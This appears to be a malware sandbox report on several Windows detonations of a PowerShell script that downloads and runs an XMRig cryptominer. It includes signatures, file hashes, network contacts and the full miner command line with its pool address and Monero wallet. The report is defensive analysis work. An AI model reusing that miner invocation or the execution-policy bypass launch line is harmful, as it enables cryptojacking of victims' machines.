N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (4).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
GB 161.35.34.195:443 rx.unmineable.com tcp

Files

memory/3556-0-0x00007FFDA2573000-0x00007FFDA2575000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ujhognzz.crm.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/3556-9-0x000001CEF5E40000-0x000001CEF5E62000-memory.dmp

memory/3556-10-0x00007FFDA2570000-0x00007FFDA3032000-memory.dmp

memory/3556-11-0x00007FFDA2570000-0x00007FFDA3032000-memory.dmp

memory/3556-12-0x00007FFDA2570000-0x00007FFDA3032000-memory.dmp

memory/3556-14-0x000001CEF6140000-0x000001CEF6152000-memory.dmp

memory/3556-15-0x000001CEF5EB0000-0x000001CEF5EBA000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/4624-46-0x000002A7AB280000-0x000002A7AB2A0000-memory.dmp

memory/4624-47-0x000002A7ACBC0000-0x000002A7ACBE0000-memory.dmp

memory/4624-48-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/3556-49-0x00007FFDA2573000-0x00007FFDA2575000-memory.dmp

memory/3556-50-0x00007FFDA2570000-0x00007FFDA3032000-memory.dmp

memory/4624-52-0x000002A7ACC00000-0x000002A7ACC20000-memory.dmp

memory/4624-51-0x000002A7ACBE0000-0x000002A7ACC00000-memory.dmp

memory/4624-53-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/3556-54-0x00007FFDA2570000-0x00007FFDA3032000-memory.dmp

memory/4624-55-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-56-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-57-0x000002A7ACBE0000-0x000002A7ACC00000-memory.dmp

memory/4624-58-0x000002A7ACC00000-0x000002A7ACC20000-memory.dmp

memory/4624-59-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-60-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-61-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-62-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-63-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-64-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-65-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-66-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-67-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-68-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-69-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-70-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-71-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-72-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-73-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-74-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-75-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-76-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-77-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-78-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-79-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-80-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-81-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-82-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-83-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-84-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-85-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-86-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-87-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-88-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-89-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-90-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-91-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-92-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-93-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-94-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-95-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-96-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-97-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-98-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-99-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-100-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-101-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-102-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-103-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-104-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-105-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-106-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-107-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-108-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-109-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-110-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-111-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-112-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-113-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-114-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-115-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-116-0x00007FF726920000-0x00007FF727553000-memory.dmp

memory/4624-117-0x00007FF726920000-0x00007FF727553000-memory.dmp

Analysis: behavioral19

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 00:54

Platform

win10v2004-20240226-en

Max time kernel

1795s

Max time network

1802s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\svchost.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=748 --field-trial-handle=3088,i,14310325015283915034,7660943942870463106,262144 --variations-seed-version /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=4064 --field-trial-handle=3088,i,14310325015283915034,7660943942870463106,262144 --variations-seed-version /prefetch:8

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" "C:\Windows\SYSTEM32\EDGEHTML.dll",#141 Microsoft.VCLibs.140.00_8wekyb3d8bbwe

C:\Windows\System32\svchost.exe

C:\Windows\System32\svchost.exe -k UnistackSvcGroup

Network

Country Destination Domain Proto
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 25.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 8.8.8.8:53 objects.githubusercontent.com udp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
US 8.8.8.8:53 133.108.199.185.in-addr.arpa udp
US 8.8.8.8:53 4.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 13.86.106.20.in-addr.arpa udp
US 8.8.8.8:53 rx.unmineable.com udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 8.8.8.8:53 195.34.35.161.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 13.107.253.67:443 tcp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 18.24.18.2.in-addr.arpa udp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 13.173.189.20.in-addr.arpa udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
US 8.8.8.8:53 chromewebstore.googleapis.com udp
FR 172.217.20.170:443 chromewebstore.googleapis.com tcp
US 8.8.8.8:53 170.20.217.172.in-addr.arpa udp
US 8.8.8.8:53 133.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 www.microsoft.com udp
BE 23.55.97.181:80 www.microsoft.com tcp
US 8.8.8.8:53 9.228.82.20.in-addr.arpa udp
US 8.8.8.8:53 181.97.55.23.in-addr.arpa udp
US 8.8.8.8:53 198.32.209.4.in-addr.arpa udp
US 8.8.8.8:53 28.190.21.2.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 153.97.55.23.in-addr.arpa udp
US 8.8.8.8:53 119.110.54.20.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 73.90.14.23.in-addr.arpa udp
US 8.8.8.8:53 15.251.17.2.in-addr.arpa udp
BE 23.14.90.73:80 tcp
BE 23.14.90.73:80 tcp
BE 23.14.90.73:80 tcp
BE 23.14.90.73:80 tcp
US 8.8.8.8:53 31.251.17.2.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 0.204.248.87.in-addr.arpa udp

Files

memory/4284-0-0x00007FFFD6D23000-0x00007FFFD6D25000-memory.dmp

memory/4284-1-0x00007FFFD6D20000-0x00007FFFD77E1000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_2zkc4rhx.yqf.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4284-11-0x000001AEDA8B0000-0x000001AEDA8D2000-memory.dmp

memory/4284-12-0x00007FFFD6D20000-0x00007FFFD77E1000-memory.dmp

memory/4284-14-0x00007FFFD6D20000-0x00007FFFD77E1000-memory.dmp

memory/4284-15-0x000001AEF2CD0000-0x000001AEF2CE2000-memory.dmp

memory/4284-16-0x000001AEF2C90000-0x000001AEF2C9A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
SHA1 bedb78ac5034259b86c2cbc915de2e861e8d7604
SHA256 2025f4fe930440da147eecd24a368d3a2f3c1883c499186eb429e9d662c90fda
SHA512 28309f453ae87e8db8c1667d8d8eee5f5f7035372c027afbec48aa3c798c53ade7cfcec0c9575cad2d108e033395ebde4fda6fcfff72c99944119f8fa91d91c3

memory/1976-47-0x000002427C700000-0x000002427C720000-memory.dmp

memory/4284-48-0x00007FFFD6D20000-0x00007FFFD77E1000-memory.dmp

memory/1976-49-0x000002427C950000-0x000002427C970000-memory.dmp

memory/4284-50-0x00007FFFD6D20000-0x00007FFFD77E1000-memory.dmp

memory/1976-51-0x00007FF6B7C50000-0x00007FF6B8883000-memory.dmp

memory/1976-52-0x00007FF6B7C50000-0x00007FF6B8883000-memory.dmp

memory/1976-53-0x000002427E150000-0x000002427E170000-memory.dmp

memory/1976-54-0x000002427C970000-0x000002427C990000-memory.dmp

memory/1976-55-0x00007FF6B7C50000-0x00007FF6B8883000-memory.dmp

memory/1976-56-0x00007FF6B7C50000-0x00007FF6B8883000-memory.dmp

memory/1976-58-0x000002427C970000-0x000002427C990000-memory.dmp

memory/1976-57-0x000002427E150000-0x000002427E170000-memory.dmp

memory/1976-59-0x00007FF6B7C50000-0x00007FF6B8883000-memory.dmp

memory/1976-60-0x00007FF6B7C50000-0x00007FF6B8883000-memory.dmp

memory/1976-61-0x00007FF6B7C50000-0x00007FF6B8883000-memory.dmp

memory/1976-62-0x00007FF6B7C50000-0x00007FF6B8883000-memory.dmp

memory/1976-63-0x00007FF6B7C50000-0x00007FF6B8883000-memory.dmp

memory/1976-64-0x00007FF6B7C50000-0x00007FF6B8883000-memory.dmp

memory/1976-65-0x00007FF6B7C50000-0x00007FF6B8883000-memory.dmp

memory/1976-66-0x00007FF6B7C50000-0x00007FF6B8883000-memory.dmp

memory/1976-67-0x00007FF6B7C50000-0x00007FF6B8883000-memory.dmp

memory/1976-68-0x00007FF6B7C50000-0x00007FF6B8883000-memory.dmp

memory/1976-69-0x00007FF6B7C50000-0x00007FF6B8883000-memory.dmp

memory/1976-70-0x00007FF6B7C50000-0x00007FF6B8883000-memory.dmp

memory/1976-71-0x00007FF6B7C50000-0x00007FF6B8883000-memory.dmp

memory/1976-72-0x00007FF6B7C50000-0x00007FF6B8883000-memory.dmp

memory/1976-73-0x00007FF6B7C50000-0x00007FF6B8883000-memory.dmp

memory/1976-74-0x00007FF6B7C50000-0x00007FF6B8883000-memory.dmp

memory/1976-75-0x00007FF6B7C50000-0x00007FF6B8883000-memory.dmp

memory/1976-76-0x00007FF6B7C50000-0x00007FF6B8883000-memory.dmp

memory/1976-77-0x00007FF6B7C50000-0x00007FF6B8883000-memory.dmp

memory/1976-78-0x00007FF6B7C50000-0x00007FF6B8883000-memory.dmp

memory/1976-79-0x00007FF6B7C50000-0x00007FF6B8883000-memory.dmp

memory/1976-80-0x00007FF6B7C50000-0x00007FF6B8883000-memory.dmp

memory/1976-81-0x00007FF6B7C50000-0x00007FF6B8883000-memory.dmp

memory/1976-82-0x00007FF6B7C50000-0x00007FF6B8883000-memory.dmp

memory/1976-83-0x00007FF6B7C50000-0x00007FF6B8883000-memory.dmp

memory/1976-84-0x00007FF6B7C50000-0x00007FF6B8883000-memory.dmp

memory/1976-85-0x00007FF6B7C50000-0x00007FF6B8883000-memory.dmp

memory/1976-86-0x00007FF6B7C50000-0x00007FF6B8883000-memory.dmp

memory/1976-87-0x00007FF6B7C50000-0x00007FF6B8883000-memory.dmp

memory/1976-88-0x00007FF6B7C50000-0x00007FF6B8883000-memory.dmp

memory/1976-89-0x00007FF6B7C50000-0x00007FF6B8883000-memory.dmp

memory/1976-90-0x00007FF6B7C50000-0x00007FF6B8883000-memory.dmp

memory/1976-91-0x00007FF6B7C50000-0x00007FF6B8883000-memory.dmp

memory/1976-92-0x00007FF6B7C50000-0x00007FF6B8883000-memory.dmp

memory/1976-93-0x00007FF6B7C50000-0x00007FF6B8883000-memory.dmp

memory/1976-94-0x00007FF6B7C50000-0x00007FF6B8883000-memory.dmp

memory/1976-95-0x00007FF6B7C50000-0x00007FF6B8883000-memory.dmp

memory/1976-96-0x00007FF6B7C50000-0x00007FF6B8883000-memory.dmp

memory/1976-97-0x00007FF6B7C50000-0x00007FF6B8883000-memory.dmp

memory/1976-98-0x00007FF6B7C50000-0x00007FF6B8883000-memory.dmp

memory/1976-99-0x00007FF6B7C50000-0x00007FF6B8883000-memory.dmp

memory/1976-100-0x00007FF6B7C50000-0x00007FF6B8883000-memory.dmp

memory/1976-101-0x00007FF6B7C50000-0x00007FF6B8883000-memory.dmp

memory/1976-102-0x00007FF6B7C50000-0x00007FF6B8883000-memory.dmp

memory/1976-103-0x00007FF6B7C50000-0x00007FF6B8883000-memory.dmp

memory/1976-104-0x00007FF6B7C50000-0x00007FF6B8883000-memory.dmp

memory/1976-105-0x00007FF6B7C50000-0x00007FF6B8883000-memory.dmp

memory/1976-106-0x00007FF6B7C50000-0x00007FF6B8883000-memory.dmp

memory/1976-107-0x00007FF6B7C50000-0x00007FF6B8883000-memory.dmp

memory/1976-108-0x00007FF6B7C50000-0x00007FF6B8883000-memory.dmp

memory/1976-109-0x00007FF6B7C50000-0x00007FF6B8883000-memory.dmp

memory/1976-110-0x00007FF6B7C50000-0x00007FF6B8883000-memory.dmp

memory/1976-111-0x00007FF6B7C50000-0x00007FF6B8883000-memory.dmp

memory/1976-112-0x00007FF6B7C50000-0x00007FF6B8883000-memory.dmp

memory/1976-113-0x00007FF6B7C50000-0x00007FF6B8883000-memory.dmp

memory/1976-114-0x00007FF6B7C50000-0x00007FF6B8883000-memory.dmp

memory/1976-115-0x00007FF6B7C50000-0x00007FF6B8883000-memory.dmp

memory/1976-116-0x00007FF6B7C50000-0x00007FF6B8883000-memory.dmp

memory/1976-117-0x00007FF6B7C50000-0x00007FF6B8883000-memory.dmp

Analysis: behavioral20

Detonation Overview

Submitted

2024-05-26 13:33

Reported

2024-05-27 00:55

Platform

win11-20240426-en

Max time kernel

1799s

Max time network

1748s

Command Line

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe N/A

Processes

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -ExecutionPolicy bypass -File "C:\Users\Admin\AppData\Local\Temp\file01 - copia (6).ps1"

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

"C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe" -a rx -o stratum+ssl://rx.unmineable.com:443 -u XMR:45aHvZ4X3ZvdhLiEiP1cjsXmSkMNoM2QFYNmXCsoTRY9h2EwjtoYcfrVpEojtmBeg5cRsY9J82Lqp6hUanQ1Dsu4UNfKxdF.unmineable_worker_vilqtiac -p x

Network

Country Destination Domain Proto
US 8.8.8.8:53 github.com udp
GB 20.26.156.215:443 github.com tcp
US 185.199.108.133:443 objects.githubusercontent.com tcp
US 8.8.8.8:53 215.156.26.20.in-addr.arpa udp
GB 161.35.34.195:443 rx.unmineable.com tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp

Files

memory/4728-0-0x00007FFD97883000-0x00007FFD97885000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_taxvil21.1jk.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4728-9-0x00007FFD97880000-0x00007FFD98342000-memory.dmp

memory/4728-10-0x00000255AA980000-0x00000255AA9A2000-memory.dmp

memory/4728-11-0x00007FFD97880000-0x00007FFD98342000-memory.dmp

memory/4728-12-0x00007FFD97880000-0x00007FFD98342000-memory.dmp

memory/4728-14-0x00000255AAA20000-0x00000255AAA32000-memory.dmp

memory/4728-15-0x00000255AA970000-0x00000255AA97A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\xmrig-6.21.3\xmrig.exe

MD5 205ad9eb6acd6f58752899669b69fe74
